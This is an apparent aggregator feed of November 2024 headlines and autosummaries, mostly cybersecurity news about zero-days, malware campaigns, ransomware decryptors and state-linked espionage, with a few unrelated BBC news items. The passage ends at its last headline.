    2024-11-15 https://www.helpnetsecurity.com/2024/11/15/sitting-ducks-attack/

    Hijacking domains using a ‘Sitting Ducks attack’ remains an underrecognized topic in the cybersecurity community. Few threat researchers are familiar with this attack vector, and knowledge is scarce. However, the prevalence of these attacks and the risk to organizations are significant. Infoblox researchers estimate that over 1 million registered domains could be vulnerable daily. More evidence found on Sitting Ducks Attacks During a Sitting Ducks attack, the malicious actor gains control of a domain by … More

    The post Cybercriminals hijack DNS to build stealth attack networks appeared first on Help Net Security.

    Autosummary: This actor uses hijacked domains to augment their malicious traffic distribution system (TDS) called 404TDS to run malicious spam operations, deliver porn, establish remote access trojan (RAT) C2s, and drop malware such as DarkGate and AsyncRAT.


    Cyber crooks push Android malware via letter

    exploits
    2024-11-15 https://www.helpnetsecurity.com/2024/11/15/android-malware-via-letter/

    Cyber crooks are trying out an interesting new approach for getting information-stealing malware installed on Android users’ smartphones: a physical letter impersonating MeteoSwiss (i.e., Switzerland’s Federal Office of Meteorology and Climatology). “The letter asks the recipients to install a new severe weather app. However, there is no such federal app with the name mentioned. Rather, the QR code shown in the letter leads to the download of malware called ‘Coper’ (also known as ‘Octo2’),” the … More

    The post Cyber crooks push Android malware via letter appeared first on Help Net Security.



    U.S. CISA adds Palo Alto Networks Expedition bugs to its Known Exploited Vulnerabilities catalog

    exploits
    2024-11-15 https://securityaffairs.com/171012/security/u-s-cisa-adds-palo-alto-networks-expedition-bugs-known-exploited-vulnerabilities-catalog.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following Palo Alto Networks Expedition vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: Last week, Palo Alto Networks addressed multiple vulnerabilities that an attacker can chain to hijack […]

    Autosummary: Below are the descriptions of the flaws addressed by the security firm: CVE-2024-9463 (CVSS 9.9), a command injection vulnerability in Palo Alto Networks’ Expedition that allows unauthenticated attackers to execute OS commands as root, exposing usernames, passwords, configurations, and API keys of PAN-OS firewalls. CISA added the following Expedition vulnerabilities to its KEV catalog: CVE-2024-9463 (Palo Alto Networks Expedition OS Command Injection Vulnerability) and CVE-2024-9465 (Palo Alto Networks Expedition SQL Injection Vulnerability). Last week, Palo Alto Networks addressed multiple vulnerabilities that an attacker can chain to hijack PAN-OS firewalls.


    "Amazing showcase" for UK gaming industry cancelled

    industry
    2024-11-15 https://www.bbc.com/news/articles/c5yxvxzp909o
    The organisers blamed "increasing costs and less demand" as the sector continues to struggle.


    Palo Alto Networks warns of critical RCE zero-day exploited in attacks

    exploits
    2024-11-15 https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-critical-rce-zero-day-exploited-in-attacks/
    Palo Alto Networks is warning that a critical zero-day vulnerability on Next-Generation Firewalls (NGFW) management interfaces, currently tracked as "PAN-SA-2024-0015," is actively being exploited in attacks. [...]

    Autosummary: Shodan map of exposed Palo Alto management interfaces (Source: Shodan). To ensure that you have applied the mitigations properly, visit the Assets section of the Palo Alto Networks Customer Support Portal to find a list of devices with Internet-facing management interfaces, and look for devices tagged with "PAN-SA-2024-0015."


    Malicious QR codes sent in the mail deliver malware

    exploits
    2024-11-15 https://www.malwarebytes.com/blog/news/2024/11/malicious-qr-codes-sent-in-the-mail-deliver-malware
    A QR code in a physical letter is a method of spreading malware that may find its way to your mailbox too.

    Autosummary: If you do not trust the URL, don’t allow your device to open the link and, if necessary, research to find another, more trustworthy, way to get the information or download you want. For most phones it works like this: under About phone or About device you can tap on Software updates to check if there are new updates available for your device, although there may be slight differences based on the brand, type, and Android version of your device.


    Iranian Hackers Deploy WezRat Malware in Attacks Targeting Israeli Organizations

    exploits
    2024-11-15 https://thehackernews.com/2024/11/iranian-hackers-deploy-wezrat-malware.html
    Cybersecurity researchers have shed light on a new remote access trojan and information stealer used by Iranian state-sponsored actors to conduct reconnaissance of compromised endpoints and execute malicious commands. Cybersecurity company Check Point has codenamed the malware WezRat, stating it has been detected in the wild since at least September 1, 2023, based on artifacts uploaded to the

    Autosummary: Attack chains, per the government authorities, involve the use of trojanized Google Chrome installers ("Google Chrome Installer.msi") that, in addition to installing the legitimate Chrome web browser, are configured to run a second binary named "Updater.exe" (internally called "bd.exe").


    Botnet exploits GeoVision zero-day to install Mirai malware

    exploits
    2024-11-15 https://www.bleepingcomputer.com/news/security/botnet-exploits-geovision-zero-day-to-install-mirai-malware/
    A malware botnet is exploiting a zero-day vulnerability in end-of-life GeoVision devices to compromise and recruit them for likely DDoS or cryptomining attacks. [...]

    Autosummary: Most of the exposed devices (9,100) are based in the United States, followed by Germany (1,600), Canada (800), Taiwan (800), Japan (350), Spain (300), and France (250).


    NSO Group used another WhatsApp zero-day after being sued, court docs say

    exploits
    2024-11-15 https://www.bleepingcomputer.com/news/security/nso-group-used-another-whatsapp-zero-day-after-being-sued-court-docs-say/
    Israeli surveillance firm NSO Group reportedly used multiple zero-day exploits, including an unknown one named "Erised," that leveraged WhatsApp vulnerabilities to deploy Pegasus spyware in zero-click attacks, even after getting sued. [...]

    Autosummary: "As a threshold matter, NSO admits that it developed and sold the spyware described in the Complaint, and that NSO's spyware—specifically its zero-click installation vector called "Eden," which was part of a family of WhatsApp-based vectors known collectively as "Hummingbird" (collectively, the "Malware Vectors")—was responsible for the attacks," the court documents reveal.


    Trump meets Argentina's Milei ahead of conservative summit

    latam
    2024-11-15 https://www.bbc.com/news/articles/cx28g3de7p1o
    Argentina's president is the first foreign leader to meet Trump since his election victory on 5 November.


    Zero-days dominate top frequently exploited vulnerabilities

    exploits
    2024-11-14 https://www.helpnetsecurity.com/2024/11/14/top-exploited-vulnerabilities-2023/

    A joint report by leading cybersecurity agencies from the U.S., UK, Canada, Australia, and New Zealand has identified the most commonly exploited vulnerabilities of 2023. Zero-day vulnerabilities on the rise The advisory highlights that malicious cyber actors increasingly targeted zero-day vulnerabilities, posing significant threats to enterprise networks. Notably, the exploitation of these zero-days rose compared to 2022. Unlike previous years, where older, unpatched vulnerabilities dominated the list, 2023 saw a spike in zero-day exploits, reflecting … More

    The post Zero-days dominate top frequently exploited vulnerabilities appeared first on Help Net Security.

    Autosummary: Unlike previous years, where older, unpatched vulnerabilities dominated the list, 2023 saw a spike in zero-day exploits, reflecting the evolving tactics of threat actors who aim to compromise high-priority targets quickly after vulnerabilities are disclosed.


    How cybersecurity failures are draining business budgets

    ciber
    2024-11-14 https://www.helpnetsecurity.com/2024/11/14/cybersecurity-failures-business-budgets/

    Security leaders feel under increasing pressure to provide assurances around cybersecurity, exposing them to greater personal risk – yet many lack the data and resources to accurately report and close cybersecurity gaps, according to Panaseer. The report analyses the findings of a survey of 400 security decision makers (SDMs) across the US and UK. Security leaders turn to indemnity insurance for protection 61% of organizations have suffered a security breach in the past year because … More

    The post How cybersecurity failures are draining business budgets appeared first on Help Net Security.

    Autosummary: Furthermore, 89% of security leaders are expected to provide more data around the role and effectiveness of security investments – with 76% saying they are under greater pressure to provide metrics to justify cyber RoI. However, 67% say cybersecurity teams are not equipped with the specialized analytical tools needed to provide these assurances to boards and regulators. Armed with this golden source of truth, CISOs are empowered to provide assurances, report risk in good faith, discover gaps in security and plug them before security incidents take place, protecting both themselves and their company.


    Red Hat Enterprise Linux 9.5 helps organizations simplify operations

    Linux
    2024-11-14 https://www.helpnetsecurity.com/2024/11/14/red-hat-enterprise-linux-9-5/

    Red Hat announced Red Hat Enterprise Linux 9.5. Red Hat Enterprise Linux helps organizations deploy applications and workloads more quickly and with greater reliability, enabling them to lower costs and more effectively manage workloads across hybrid cloud deployments while mitigating IT risks, from the datacenter to public clouds to the edge. According to IDC, “Organizations continue to find themselves at odds with striking the balance between maintaining their Linux operating system environments and the workloads … More

    The post Red Hat Enterprise Linux 9.5 helps organizations simplify operations appeared first on Help Net Security.

    Autosummary: In addition, Red Hat Enterprise Linux 9.5 now offers new file management capabilities to the web console, allowing users to perform routine file management tasks without using the command line, such as browsing the file system, uploading and downloading files, changing permissions and creating directories. “They further called out the value of automation, better scalability and access to Red Hat Enterprise Linux expertise,” said Greg Macatee, research manager, Infrastructure Software Platforms, Worldwide Infrastructure Research, IDC.


    Google Cloud Cybersecurity Forecast 2025: AI, geopolitics, and cybercrime take centre stage

    industry ciber
    2024-11-14 https://www.helpnetsecurity.com/2024/11/14/google-cybersecurity-forecast-2025/

    Google Cloud unveiled its Cybersecurity Forecast for 2025, offering a detailed analysis of the emerging threat landscape and key security trends that organizations worldwide should prepare for. The report delivers insights into the tactics of cyber adversaries, providing advice for increasing security posture in the coming year. The year of AI-driven cyberattacks The report highlights a shift in the cybersecurity landscape: the rise of artificial intelligence (AI) as a double-edged sword. While AI offers new … More

    The post Google Cloud Cybersecurity Forecast 2025: AI, geopolitics, and cybercrime take centre stage appeared first on Help Net Security.

    Autosummary: Key recommendations: Prioritize cloud security: Organisations should embrace cloud-native security solutions, such as cloud-based SIEM and SOAR platforms, to improve visibility, threat detection, and incident response capabilities. “2025 is going to be the year when AI moves from pilots and prototypes into large-scale adoption,” Phil Venables, VP, TI Security & CISO, Google Cloud, added.


    Russian Hackers Exploit New NTLM Flaw to Deploy RAT Malware via Phishing Emails

    financial exploits rusia-ucrania
    2024-11-14 https://thehackernews.com/2024/11/russian-hackers-exploit-new-ntlm-flaw.html
    A newly patched security flaw impacting Windows NT LAN Manager (NTLM) was exploited as a zero-day by a suspected Russia-linked actor as part of cyber attacks targeting Ukraine. The vulnerability in question, CVE-2024-43451 (CVSS score: 6.5), refers to an NTLM hash disclosure spoofing vulnerability that could be exploited to steal a user's NTLMv2 hash. It was patched by Microsoft earlier this

    Autosummary: "Minimal interaction with a malicious file by a user such as selecting (single-click), inspecting (right-click), or performing an action other than opening or executing could trigger this vulnerability," Microsoft revealed in its advisory.


    Scammer robs homebuyers of life savings in $20 million theft spree

    financial
    2024-11-14 https://www.malwarebytes.com/blog/news/2024/11/scammer-robs-homebuyers-of-life-savings-in-20-million-theft-spree
    A scammer was caught after they defrauded some 400 people for almost $20 million in real estate.

    Autosummary: In the initial phase, Babatunde Francis Ayeni and his criminal gang targeted US title companies, real estate agents, and real estate attorneys.


    Google launches on-device AI to alert Android users of scam calls in real-time

    financial
    2024-11-14 https://www.helpnetsecurity.com/2024/11/14/android-scam-detection/

    Google has announced new security features for Android that provide real-time protection against scams and harmful apps. These features, powered by advanced on-device AI, enhance user safety without compromising privacy. These new security features are available first on Pixel and are coming soon to more Android devices. Scam Detection One of the key features is Scam Detection, which leverages on-device AI to identify potential scam calls in real-time. This feature analyzes conversation patterns to detect … More

    The post Google launches on-device AI to alert Android users of scam calls in real-time appeared first on Help Net Security.

    Autosummary: Scam Detection One of the key features is Scam Detection, which leverages on-device AI to identify potential scam calls in real-time.


    FBI confirms China-linked cyber espionage involving breached telecom providers

    Telcos
    2024-11-14 https://www.helpnetsecurity.com/2024/11/14/cyber-espionage-telecommunications-us/

    After months of news reports that Chinese threat actors have breached the networks of US telecommunications and internet service providers, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) have confirmed the success of the attacks, which were part of a “broad and significant cyber espionage campaign.” “Specifically, we have identified that PRC-affiliated actors have compromised networks at multiple telecommunications companies to enable the theft of customer call records data, the compromise of private … More

    The post FBI confirms China-linked cyber espionage involving breached telecom providers appeared first on Help Net Security.



    How a Windows zero-day was exploited in the wild for months (CVE-2024-43451)

    exploits
    2024-11-14 https://www.helpnetsecurity.com/2024/11/14/cve-2024-43451-exploited/

    CVE-2024-43451, a Windows zero-day vulnerability for which Microsoft released a fix on November 2024 Patch Tuesday, has been exploited since at least April 2024, ClearSky researchers have revealed. About the vulnerability CVE-2024-43451 affects all supported Windows versions and, when triggered, discloses a user’s NTLMv2 hash to the attacker, who can then use it to either mount pass the hash attacks or extract the user’s password from the hash. The result is in both cases the … More

    The post How a Windows zero-day was exploited in the wild for months (CVE-2024-43451) appeared first on Help Net Security.

    Autosummary: “On Windows 7, 8, and 8.1, the file did not initiate communication when dragged or deleted, unless the target folder was open at the time of dragging (this did not happen on the first attempt but was observed only after 2-3 attempts),” they found.


    5 BCDR Oversights That Leave You Exposed to Ransomware

    exploits ransomware
    2024-11-14 https://thehackernews.com/2024/11/5-bcdr-oversights-that-leave-you-exposed-to-ransomware.html
    Ransomware isn’t just a buzzword; it’s one of the most dreaded challenges businesses face in this increasingly digitized world. Ransomware attacks are not only increasing in frequency but also in sophistication, with new ransomware groups constantly emerging. Their attack methods are evolving rapidly, becoming more dangerous and damaging than ever. Almost all respondents (99.8%) in a recent

    Autosummary: According to IBM X-Force Threat Intelligence Index 2024, cyberattacks involving valid stolen or compromised credentials rose by over 70% year-over-year.[3] To better protect your SaaS data from ransomware, consider implementing these key recommendations: Implement third-party backup solutions that are purpose-built for SaaS environments. Regular application-level recovery tests help identify hidden issues like data corruption, configuration errors, or dependency failures, which can prevent applications from running smoothly post-recovery. Today, SaaS apps, such as Google Workspace, Microsoft 365 and Salesforce, hold large volumes of business-critical data. Insufficient recovery testing can result in prolonged downtime, failed recoveries, loss of critical data and operational disruption, impacting business continuity and escalating costs associated with restoring services. Whether your organization's critical data is stored on on-premises data centers, in the cloud, within SaaS applications or on endpoints, Unitrends protects it all.


    ShrinkLocker ransomware: what you need to know

    exploits ransomware
    2024-11-14 https://www.tripwire.com/state-of-security/shrinklocker-ransomware-what-you-need-know
    ShrinkLocker is a family of ransomware that encrypts an organisation's data and demands a ransom payment in order to restore access to their files. It was first identified by security researchers in May 2024, after attacks were observed in Mexico, Indonesia, and Jordan. Read more in my article on the Tripwire State of Security blog.

    Autosummary: Which is great if your laptop is stolen by a thief... ...but not so good if ShrinkLocker is the one that's chosen to scramble your data with Bitlocker, and not told you the password it used.


    Google Warns of Rising Cloaking Scams, AI-Driven Fraud, and Crypto Schemes

    financial
    2024-11-14 https://thehackernews.com/2024/11/google-warns-of-rising-cloaking-scams.html
    Google has revealed that bad actors are leveraging techniques like landing page cloaking to conduct scams by impersonating legitimate sites. "Cloaking is specifically designed to prevent moderation systems and teams from reviewing policy-violating content which enables them to deploy the scam directly to users," Laurie Richardson, VP and Head of Trust and Safety at Google, said. "The landing

    Autosummary: Some of the other recent tactics adopted by fraudsters and cybercriminals are listed below: misuse of artificial intelligence (AI) tools to create deepfakes of public figures, taking advantage of their credibility and reach to conduct investment fraud; using hyper-realistic impersonation for bogus crypto investment schemes; app and landing page clone scams that dupe users into visiting lookalike pages of their legitimate counterparts, leading to credential or data theft, malware downloads, and fraudulent purchases; capitalizing on major events and combining them with AI to defraud people or promote non-existent products and services. Google told The Hacker News that it intends to release such advisories about online fraud and scams every six months as part of its efforts to raise awareness about the risks.


    New RustyAttr Malware Targets macOS Through Extended Attribute Abuse

    exploits
    2024-11-14 https://thehackernews.com/2024/11/new-rustyattr-malware-targets-macos.html
    Threat actors have been found leveraging a new technique that abuses extended attributes for macOS files to smuggle a new malware called RustyAttr. The Singaporean cybersecurity company has attributed the novel activity with moderate confidence to the infamous North Korea-linked Lazarus Group, citing infrastructure and tactical overlaps observed in connection with prior campaigns, including

    Autosummary: "Upon executing the application, the Tauri application attempts to render an HTML webpage using a WebView," Group-IB security researcher Sharmine Low said.


    New Glove infostealer malware bypasses Chrome’s cookie encryption

    exploits
    2024-11-14 https://www.bleepingcomputer.com/news/security/new-glove-infostealer-malware-bypasses-google-chromes-cookie-encryption/
    New Glove Stealer information-stealing malware can bypass Google Chrome’s Application-Bound (App-Bound) encryption to steal browser cookies. [...]

    Autosummary: It’s also capable of stealing cryptocurrency wallets from browser extensions, 2FA session tokens from Google, Microsoft, Aegis, and LastPass authenticator apps, password data from Bitwarden, LastPass, and KeePass, as well as emails from mail clients like Thunderbird.


    CISA warns of more Palo Alto Networks bugs exploited in attacks

    exploits
    2024-11-14 https://www.bleepingcomputer.com/news/security/cisa-warns-of-more-palo-alto-networks-bugs-exploited-in-attacks/
    CISA warned today that two more critical security vulnerabilities in Palo Alto Networks’ Expedition migration tool are now actively exploited in attacks. [...]


    China-linked threat actors compromised multiple telcos and spied on a limited number of U.S. government officials

    government
    2024-11-14 https://securityaffairs.com/170981/intelligence/china-linked-threat-actors-spied-on-u-s-gov-officials.html
    China-linked threat actors breached U.S. broadband providers and gained access to private communications of a limited number of U.S. government officials. The FBI and CISA continue to investigate a large-scale cyber-espionage campaign by China-linked threat actors targeting U.S. telecoms, compromising networks to steal call records and access private communications, mainly of government and political figures. […]

    Autosummary: Pierluigi Paganini, November 14, 2024.


    Bitdefender released a decryptor for the ShrinkLocker ransomware

    exploits ransomware
    2024-11-14 https://securityaffairs.com/170934/cyber-crime/shrinklocker-ransomware-decryptor.html
    Bitdefender released a decryptor for the ShrinkLocker ransomware, which modifies BitLocker configurations to encrypt a system’s drives. ShrinkLocker ransomware was first discovered in May 2024 by researchers from Kaspersky. Unlike modern ransomware it doesn’t rely on sophisticated encryption algorithms and modifies BitLocker configurations to encrypt a system’s drives. It first checks if BitLocker is enabled […]

    Autosummary: Pierluigi Paganini, November 14, 2024. Proactive monitoring of Windows event logs, specifically from the “Microsoft-Windows-BitLocker-API/Management” source, can help organizations detect early stages of BitLocker attacks, such as when attackers test encryption capabilities.


    One dead after attack on Brazil’s Supreme Court

    latam
    2024-11-14 https://www.bbc.com/news/articles/c0j8el1q1gjo
    The suspected attacker is believed to have been killed by his own explosives.

    Autosummary: Jair Bolsonaro’s adviser, Fabio Wajngarten, wrote on X: “There are crazy people everywhere, across all political spectrums, supporters of all teams, of all beliefs and religions.”


    Tips for a successful cybersecurity job interview

    ciber
    2024-11-13 https://www.helpnetsecurity.com/2024/11/13/cybersecurity-job-interview-questions-tips/

    Whether you’re looking to enhance your existing cybersecurity skills or just beginning your journey in the field, cybersecurity offers a wide range of career opportunities. If you’re considering a career shift, exploring new job opportunities, or aiming to upgrade your skill set, take time to learn about the questions to prepare for in your upcoming cybersecurity job interview. Preparing for the job interview: Researching the potential employer will enable you to answer questions in ways … More

    The post Tips for a successful cybersecurity job interview appeared first on Help Net Security.

    Autosummary:
    - Explain the concept of a secure password
    - Discuss the importance of disaster recovery planning in cybersecurity
    - Discuss the role of artificial intelligence in cybersecurity
    - Explain the concept of micro-segmentation in network security
    - Explain the concept of federated identity management
    Final cybersecurity interview questions: Companies typically use final interviews to address any remaining questions and assess which finalist is the best fit for the role, team, and company.


    Social engineering scams sweep through financial institutions

    financial
    2024-11-13 https://www.helpnetsecurity.com/2024/11/13/financial-institutions-scams/

    North American financial institutions fielded 10 times more reports of social engineering scams in 2024 than they did a year ago, according to BioCatch. The data shows scams now represent 23% of all digital banking fraud. Growing danger of deepfake and GenAI scams: BioCatch published these findings in its 2024 Digital Banking Fraud Trends in North America report, which also details a 94% uptick in reported money mule (or money laundering) accounts. “Reports of North … More

    The post Social engineering scams sweep through financial institutions appeared first on Help Net Security.

    Autosummary: “As we outlined in our 2024 AI, Fraud, and Financial Crime Survey and ScamGPT white paper, AI is super-charging fraud,” said BioCatch Global Advisory Director Seth Ruden.


    Iranian Hackers Use "Dream Job" Lures to Deploy SnailResin Malware in Aerospace Attacks

    exploits
    2024-11-13 https://thehackernews.com/2024/11/iranian-hackers-use-dream-job-lures-to.html
    The Iranian threat actor known as TA455 has been observed taking a leaf out of a North Korean hacking group’s playbook to orchestrate its own version of the Dream Job campaign targeting the aerospace industry by offering fake jobs since at least September 2023. "The campaign distributed the SnailResin malware, which activates the SlugResin backdoor," Israeli cybersecurity company ClearSky said

    Autosummary: TA455, also tracked by Google-owned Mandiant as UNC1549 and Yellow Dev 13, is assessed to be a sub-cluster within APT35, which is known by the names CALANQUE, Charming Kitten, CharmingCypress, ITG18, Mint Sandstorm (formerly Phosphorus), Newscaster, TA453, and Yellow Garuda.


    Microsoft Fixes 90 New Flaws, Including Actively Exploited NTLM and Task Scheduler Bugs

    exploits
    2024-11-13 https://thehackernews.com/2024/11/microsoft-fixes-90-new-vulnerabilities.html
    Microsoft on Tuesday revealed that two security flaws impacting Windows NT LAN Manager (NTLM) and Task Scheduler have come under active exploitation in the wild. The security vulnerabilities are among the 90 security bugs the tech giant addressed as part of its Patch Tuesday update for November 2024. Of the 90 flaws, four are rated Critical, 85 are rated Important, and one is rated Moderate in

    Autosummary: The highest-rated vulnerability in this month’s release is a remote code execution flaw in Azure CycleCloud (CVE-2024-43602, CVSS score: 9.9), which allows an attacker with basic user permissions to gain root-level privileges. "Attackers continue to be adamant about discovering and exploiting zero-day vulnerabilities that can disclose NTLMv2 hashes, as they can be used to authenticate to systems and potentially move laterally within a network to access other systems," Satnam Narang, senior staff research engineer at Tenable, said in a statement.


    OvrC Platform Vulnerabilities Expose IoT Devices to Remote Attacks and Code Execution

    industry
    2024-11-13 https://thehackernews.com/2024/11/ovrc-platform-vulnerabilities-expose.html
    A security analysis of the OvrC cloud platform has uncovered 10 vulnerabilities that could be chained to allow potential attackers to execute code remotely on connected devices. "Attackers successfully exploiting these vulnerabilities can access, control, and disrupt devices supported by OvrC; some of those include smart electrical power supplies, cameras, routers, home automation systems, and

    Autosummary: The most severe of the flaws are listed below:
    - CVE-2023-28649 (CVSS v4 score: 9.2), which allows an attacker to impersonate a hub and hijack a device
    - CVE-2023-31241 (CVSS v4 score: 9.2), which allows an attacker to claim arbitrary unclaimed devices by bypassing the requirement for a serial number
    - CVE-2023-28386 (CVSS v4 score: 9.2), which allows an attacker to upload arbitrary firmware updates resulting in code execution
    - CVE-2024-50381 (CVSS v4 score: 9.1), which allows an attacker to impersonate a hub and unclaim devices arbitrarily and subsequently exploit other flaws to claim it
    "With more devices coming online every day and cloud management becoming the dominant means of configuring and accessing services, more than ever, the impetus is on manufacturers and cloud service providers to secure these devices and connections," Katz said.


    New ShrinkLocker ransomware decryptor recovers BitLocker password

    exploits ransomware
    2024-11-13 https://www.bleepingcomputer.com/news/security/new-shrinklocker-ransomware-decryptor-recovers-bitlocker-password/
    Bitdefender has released a decryptor for the "ShrinkLocker" ransomware strain, which uses Windows’ built-in BitLocker drive encryption tool to lock victims’ files. [...]

    Autosummary: In a report today, Bitdefender highlights a ShrinkLocker attack against a healthcare organization where attackers encrypted Windows 10, Windows 11, and Windows Server devices across the network, including backups.


    GoIssue phishing tool targets GitHub developer credentials

    financial
    2024-11-13 https://www.helpnetsecurity.com/2024/11/13/goissue-phishing-tool-targets-github-developer-credentials/

    Researchers discovered GoIssue, a new phishing tool targeting GitHub users, designed to extract email addresses from public profiles and launch mass email attacks. Marketed on a cybercrime forum, GoIssue allows attackers to send bulk emails while keeping their identity hidden using proxies. The tool’s capabilities extend beyond simple phishing, posing a threat to entire organizations by potentially hijacking developer accounts and accessing private repositories. GoIssue may be linked to the GitLoker extortion campaign, which uses … More

    The post GoIssue phishing tool targets GitHub developer credentials appeared first on Help Net Security.


    Free Decryptor Released for BitLocker-Based ShrinkLocker Ransomware Victims

    exploits ransomware
    2024-11-13 https://thehackernews.com/2024/11/free-decryptor-released-for-bitlocker.html
    Romanian cybersecurity company Bitdefender has released a free decryptor to help victims recover data encrypted using the ShrinkLocker ransomware. The decryptor is the result of a comprehensive analysis of ShrinkLocker’s inner workings, allowing the researchers to discover a "specific window of opportunity for data recovery immediately after the removal of protectors from BitLocker-encrypted

    Autosummary: "Even if the server is rebooted manually (e.g. by an unsuspecting administrator), the script does not have a mechanism to resume its execution after the reboot, meaning that the attack may be interrupted or prevented," Martin Zugec, technical solutions director at Bitdefender, said.


    Critical bug in EoL D-Link NAS devices now exploited in attacks

    exploits
    2024-11-13 https://www.bleepingcomputer.com/news/security/critical-bug-in-eol-d-link-nas-devices-now-exploited-in-attacks/
    Attackers now target a critical severity vulnerability with publicly available exploit code that affects multiple models of end-of-life D-Link network-attached storage (NAS) devices. [...]

    Autosummary: Image: FOFA scan for exposed D-Link NAS devices (Netsecfish). While Shadowserver said it spotted just over 1,100 Internet-exposed D-Link NAS devices, Netsecfish said it found over 41,000 unique IP addresses online used by vulnerable devices in an Internet scan with Huashun Xin’an’s FOFA platform.


    New Google Pixel AI feature analyzes phone conversations for scams

    financial
    2024-11-13 https://www.bleepingcomputer.com/news/google/new-google-pixel-ai-feature-analyzes-phone-conversations-for-scams/
    Google is adding a new AI-powered scam protection feature that monitors phone call conversations on Google Pixel devices to detect patterns that warn when the caller may be a scammer. [...]

    Autosummary: Anti-stalkerware system: The second feature is the new "Live Threat Detection" in Google Play Protect, Android’s default anti-malware and security tool that protects users in real time.


    US govt officials’ communications compromised in recent telecom hack

    Telcos
    2024-11-13 https://www.bleepingcomputer.com/news/security/chinese-hackers-compromised-us-government-officials-private-communications-in-recent-telecom-breach/
    CISA and the FBI confirmed that Chinese hackers compromised the "private communications" of a "limited number" of government officials after breaching multiple U.S. broadband providers. [...]


    Microsoft patches Windows zero-day exploited in attacks on Ukraine

    exploits
    2024-11-13 https://www.bleepingcomputer.com/news/security/microsoft-patches-windows-zero-day-exploited-in-attacks-on-ukraine/
    Suspected Russian hackers were caught exploiting a recently patched Windows vulnerability as a zero-day in ongoing attacks targeting Ukrainian entities. [...]

    Autosummary: "Minimal interaction with a malicious file by a user such as selecting (single-click), inspecting (right-click), or performing an action other than opening or executing could trigger this vulnerability."


    Microsoft Patch Tuesday security updates for November 2024 fix two actively exploited zero-days

    exploits
    2024-11-13 https://securityaffairs.com/170851/hacking/microsoft-patch-tuesday-november-2024.html
    Microsoft Patch Tuesday security updates for November 2024 addressed 89 vulnerabilities, including two actively exploited zero-day flaws. Microsoft Patch Tuesday security updates for November 2024 fixed 89 vulnerabilities in Windows and Windows Components; Office and Office Components; Azure; .NET and Visual Studio; LightGBM; Exchange Server; SQL Server; TorchGeo; Hyper-V; and Windows VMSwitch. Four of these […]

    Autosummary: Pierluigi Paganini, November 13, 2024.


    Mexican city’s security chief held over mayor’s beheading

    government
    2024-11-13 https://www.bbc.com/news/articles/c5yxqjqed81o
    The mayor of Chilpancingo, Alejandro Arcos, was murdered just days after taking office last month.


    Cybersecurity jobs available right now: November 12, 2024

    ciber
    2024-11-12 https://www.helpnetsecurity.com/2024/11/12/cybersecurity-jobs-available-right-now-november-12-2024/

    Cloud Security Lead, CIÉ – Córas Iompair Éireann | Ireland | Hybrid. As a Cloud Security Lead, you will ensure the security of CIE’s Azure environment by developing and implementing cloud security strategies and policies. You will safeguard cloud-based data and applications, collaborate with IT teams to integrate cloud security measures, and assess and advise on cloud security configurations. Additionally, you will contribute to security-related design and implementation and work closely … More

    The post Cybersecurity jobs available right now: November 12, 2024 appeared first on Help Net Security.

    Autosummary:
    - Network Security Specialist, Taldor | Israel | On-site. As a Network Security Specialist, you will be responsible for access control, device protection, firewall management, IPS, DLP, and the installation, operation, and maintenance of cybersecurity products (including mobile device antivirus).
    - Information Security Specialist – Red Team Operator, TD | Canada | Hybrid. As an Information Security Specialist – Red Team Operator, you will provide consultation and advice to partners on a broad range of Technology Controls, Information Security programs, policies, standards, and incidents within your specialized area.
    - Senior Security Engineer – Web Application Firewall (WAF), DraftKings | USA | Remote. As a Senior Security Engineer – Web Application Firewall (WAF), you will manage and enhance security for the CDN and WAF, including DoS/DDoS mitigation, credential-stuffing prevention, and overall cloud security posture improvement.
    - Information Security Engineer (VAPT), NCR Voyix | India | Hybrid. As an Information Security Engineer (VAPT), you will conduct penetration tests on internal and external networks, web applications, mobile applications, APIs, and cloud environments.


    Ambitious cybersecurity regulations leave companies in compliance chaos

    ciber
    2024-11-12 https://www.helpnetsecurity.com/2024/11/12/regulations-organizations-challenges-video/

    While the goal of cybersecurity regulations is to bring order among organizations and ensure they take security and risks seriously, the growing number of regulations has also introduced a considerable set of challenges that organizations and their leaders must address. Sara Behar, Content Manager at YL Ventures, discusses how recent regulatory actions and high-profile legal incidents involving cybersecurity leaders have influenced CISO reporting. Chris Denbigh-White, CSO at Next DLP, discusses how emerging technologies, such as … More

    The post Ambitious cybersecurity regulations leave companies in compliance chaos appeared first on Help Net Security.


    New Ymir Ransomware Exploits Memory for Stealthy Attacks; Targets Corporate Networks

    exploits ransomware
    2024-11-12 https://thehackernews.com/2024/11/new-ymir-ransomware-exploits-memory-for.html
    Cybersecurity researchers have flagged a new ransomware family called Ymir that was deployed in an attack two days after systems were compromised by a stealer malware called RustyStealer. "Ymir ransomware introduces a unique combination of technical features and tactics that enhance its effectiveness," Russian cybersecurity vendor Kaspersky said. "Threat actors leveraged an unconventional blend

    Autosummary: "If the brokers are indeed the same actors who deployed the ransomware, this could signal a new trend, creating additional hijacking options without relying on traditional Ransomware-as-a-Service (RaaS) groups," Kaspersky researcher Cristian Souza said. Last month, Secureworks, which is set to be acquired by Sophos early next year, revealed that the number of active ransomware groups has witnessed a 30% year-over-year increase, driven by the emergence of 31 new groups in the ecosystem.


    An energy efficient home - is it worth the cost?

    industry
    2024-11-12 https://www.bbc.com/news/articles/cqxwjwqw3xdo
    It can be hard to find good advice on how to make homes more energy efficient.

    Autosummary: “We can model all the different options that are available, suitable for your home and your budget, and identify a package of measures,” says Liz Lainé, of Parity Projects, a housing data analysis company, which runs Ecofurb. Improving the energy efficiency of homes is “essential” for decarbonisation, says Gerald Charles, head of housing retrofit at the Centre for Sustainable Energy, but he adds that the current lack of good advice remains a genuine problem. Perseverance during the past three years paid off, however, and the couple’s 1930s detached house now has improved insulation, a heat pump, and an electric car charging point.


    Winter Fuel Payment scam targets UK citizens via SMS

    financial
    2024-11-12 https://www.tripwire.com/state-of-security/winter-fuel-payment-scam-targets-uk-citizens-sms
    Scammers have leapt at the opportunity to exploit vulnerable UK residents by sending bogus messages telling them they need to take action to receive help with their winter heating bills. Read more in my article on the Tripwire State of Security blog.

    Autosummary: Other examples seen have used other URL shorteners, such as bit.ly, and the scammers behind the campaign have used a variety of different messages to socially engineer unsuspecting users into visiting a phishing site.


    Zscaler Zero Trust Segmentation prevents lateral movement from ransomware attacks

    exploits ransomware
